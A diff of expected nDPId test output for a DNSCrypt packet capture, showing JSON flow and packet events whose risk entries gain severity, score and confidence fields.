AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00683{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946735705348,"flow_last_seen":946735705348,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946735705348,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.56.228.45","src_port":35495,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00792{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946735705348,"flow_last_seen":946735705348,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946735705348,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.56.228.45","src_port":35495,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00425{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":5,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"ts_msec":946735705348,"pkt":"REREREREZmZmZmZmCABFAABQCgEAub0RuMAKAAABlTjkLQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="}
 00207{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":5,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60}
 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946735705349,"flow_last_seen":946735705349,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946735705349,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.56.228.45","src_port":33565,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 01132{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":946735705349,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"ts_msec":946735705349,"pkt":"REREREREZmZmZmZmCABFAAIcCgJAAL0Rd6wKAAABlTjkLYMdAbsCCDw8f0UBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAhkbnNjcnlwdARjYS0yAAAQAAEAAAAAAAAAAAABxgAMAcIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00679{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946735705349,"flow_last_seen":946735705349,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946735705349,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.56.228.45","src_port":33565,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00788{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946735705349,"flow_last_seen":946735705349,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946735705349,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.56.228.45","src_port":33565,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946735705349,"flow_last_seen":946735705349,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946735705349,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.56.228.45","src_port":35228,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02415{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":946735705349,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"ts_msec":946735705349,"pkt":"REREREREZmZmZmZmCABFAAXcCgMgAL0Rk+sKAAABlTjkLYmcAbsGBJVVf0IBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAhkbnNjcnlwdARjYS0yAAAQAAEAAAAAAAAAAAAFwgAMBb4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00683{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946735705349,"flow_last_seen":946735705349,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946735705349,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.56.228.45","src_port":35228,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00792{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946735705349,"flow_last_seen":946735705349,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946735705349,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.56.228.45","src_port":35228,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00425{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":8,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"ts_msec":946735705349,"pkt":"REREREREZmZmZmZmCABFAABQCgMAub0RuL4KAAABlTjkLQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="}
 00207{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":8,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60}
 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946735705349,"flow_last_seen":946735705349,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946735705349,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.56.228.45","src_port":60301,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 01132{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":946735705349,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"ts_msec":946735705349,"pkt":"REREREREZmZmZmZmCABFAAIcCgRAAL0Rd6oKAAABlTjkLeuNAbsCCDw8f0MBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAhkbnNjcnlwdARjYS0yAAAQAAEAAAAAAAAAAAABxgAMAcIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00679{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946735705349,"flow_last_seen":946735705349,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946735705349,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.56.228.45","src_port":60301,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00788{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946735705349,"flow_last_seen":946735705349,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946735705349,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.56.228.45","src_port":60301,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00700{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":946735705453,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":226,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":226,"pkt_l4_len":192,"ts_msec":946735705453,"pkt":"ZmZmZmZmRERERERECABFAADUC5oAADQRQF2VOOQtCgAAAQG7lfQAwC\/rf0eBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydAhkbnNjcnlwdARjYS0yAAAQAAHADAAQAAEAAAAAAH18RE5TQwACAAAFGFEAAwsZ+sBWpvUVROInn0h1y0+FE\/VHdPKdwGWI15rFeV84ZdSkid7VtVlPn9SchFzfn3Pj66PFpyoNS6YMir6PRfcrBtc8JsfsQb\/FwAoHgENy0Ke+Bxb4NU7gNSOLvo9F9ysG119TYaFfU2GhX1SzIQ=="}
 00699{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":946735705457,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":226,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":226,"pkt_l4_len":192,"ts_msec":946735705457,"pkt":"ZmZmZmZmRERERERECABFAADUC5sAADQRQFyVOOQtCgAAAQG7640AwNpVf0OBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydAhkbnNjcnlwdARjYS0yAAAQAAHADAAQAAEAAAAAAH18RE5TQwACAAAFGFEAAwsZ+sBWpvUVROInn0h1y0+FE\/VHdPKdwGWI15rFeV84ZdSkid7VtVlPn9SchFzfn3Pj66PFpyoNS6YMir6PRfcrBtc8JsfsQb\/FwAoHgENy0Ke+Bxb4NU7gNSOLvo9F9ysG119TYaFfU2GhX1SzIQ=="}
 00699{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":946735705457,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":226,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":226,"pkt_l4_len":192,"ts_msec":946735705457,"pkt":"ZmZmZmZmRERERERECABFAADUC5wAADQRQFuVOOQtCgAAAQG7spoAwBNIf0SBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydAhkbnNjcnlwdARjYS0yAAAQAAHADAAQAAEAAAAAAH18RE5TQwACAAAFGFEAAwsZ+sBWpvUVROInn0h1y0+FE\/VHdPKdwGWI15rFeV84ZdSkid7VtVlPn9SchFzfn3Pj66PFpyoNS6YMir6PRfcrBtc8JsfsQb\/FwAoHgENy0Ke+Bxb4NU7gNSOLvo9F9ysG119TYaFfU2GhX1SzIQ=="}
 00699{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":946735705459,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":226,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":226,"pkt_l4_len":192,"ts_msec":946735705459,"pkt":"ZmZmZmZmRERERERECABFAADUC58AADQRQFiVOOQtCgAAAQG7iZwAwDxIf0KBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydAhkbnNjcnlwdARjYS0yAAAQAAHADAAQAAEAAAAAAH18RE5TQwACAAAFGFEAAwsZ+sBWpvUVROInn0h1y0+FE\/VHdPKdwGWI15rFeV84ZdSkid7VtVlPn9SchFzfn3Pj66PFpyoNS6YMir6PRfcrBtc8JsfsQb\/FwAoHgENy0Ke+Bxb4NU7gNSOLvo9F9ysG119TYaFfU2GhX1SzIQ=="}
 00699{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":946735705460,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":226,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":226,"pkt_l4_len":192,"ts_msec":946735705460,"pkt":"ZmZmZmZmRERERERECABFAADUC50AADQRQFqVOOQtCgAAAQG7iqcAwDs5f0aBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydAhkbnNjcnlwdARjYS0yAAAQAAHADAAQAAEAAAAAAH18RE5TQwACAAAFGFEAAwsZ+sBWpvUVROInn0h1y0+FE\/VHdPKdwGWI15rFeV84ZdSkid7VtVlPn9SchFzfn3Pj66PFpyoNS6YMir6PRfcrBtc8JsfsQb\/FwAoHgENy0Ke+Bxb4NU7gNSOLvo9F9ysG119TYaFfU2GhX1SzIQ=="}
 00699{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":946735705461,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":226,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":226,"pkt_l4_len":192,"ts_msec":946735705461,"pkt":"ZmZmZmZmRERERERECABFAADUC54AADQRQFmVOOQtCgAAAQG7gx0AwELEf0WBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydAhkbnNjcnlwdARjYS0yAAAQAAHADAAQAAEAAAAAAH18RE5TQwACAAAFGFEAAwsZ+sBWpvUVROInn0h1y0+FE\/VHdPKdwGWI15rFeV84ZdSkid7VtVlPn9SchFzfn3Pj66PFpyoNS6YMir6PRfcrBtc8JsfsQb\/FwAoHgENy0Ke+Bxb4NU7gNSOLvo9F9ysG119TYaFfU2GhX1SzIQ=="}
-00719{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":16,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946735705348,"flow_last_seen":946735705453,"flow_idle_time":180000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":696,"flow_avg_l4_payload_len":348,"midstream":0,"ts_msec":946739299327,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.56.228.45","src_port":38388,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00721{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":16,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946735705349,"flow_last_seen":946735705459,"flow_idle_time":180000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1656,"flow_avg_l4_payload_len":828,"midstream":0,"ts_msec":946739299327,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.56.228.45","src_port":35228,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00721{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":16,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946735705348,"flow_last_seen":946735705457,"flow_idle_time":180000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1656,"flow_avg_l4_payload_len":828,"midstream":0,"ts_msec":946739299327,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.56.228.45","src_port":45722,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00721{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":16,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946735705348,"flow_last_seen":946735705460,"flow_idle_time":180000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1656,"flow_avg_l4_payload_len":828,"midstream":0,"ts_msec":946739299327,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.56.228.45","src_port":35495,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00719{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":16,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946735705349,"flow_last_seen":946735705461,"flow_idle_time":180000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":696,"flow_avg_l4_payload_len":348,"midstream":0,"ts_msec":946739299327,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.56.228.45","src_port":33565,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
